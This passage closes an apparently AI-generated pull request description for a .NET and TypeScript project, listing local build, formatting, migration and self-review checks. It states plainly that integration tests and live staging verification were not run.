- `dotnet build backend/src/Api/Api.csproj` regenerated `openapi-v1.json`/`api-client.ts`/`ApiClient.cs` and diffed byte-identical against what's committed.
- `dotnet format --verify-no-changes` and `dotnet ef migrations has-pending-model-changes` (none needed - no schema change) both pass.
- Self-review: `nswag-check`, `ef-migration-check`, `architecture-check`, `a11y-check`, and `i18n-check` all ran clean.

Docker/Testcontainers and the Aspire/Playwright stack aren't available in this sandbox, so IntegrationTests/VisualTests were validated by compiling and by manual trace through the query/component logic rather than executing them here - CI runs them for real.

## Live verification

Skipped for this PR at explicit instruction - no release candidate was cut and nothing was checked against live staging. Everything above is local build/test verification only.

## Checklist

- [x] `/self-review` run and findings addressed
- [ ] CI is green
- [x] Documentation updated (README.md feature list, arc42 building-block view, backend module PlantUML diagram)

---
_Generated by [Claude Code](https://claude.ai/code/session_01W5sUurC9jho49btjvW8WWd)_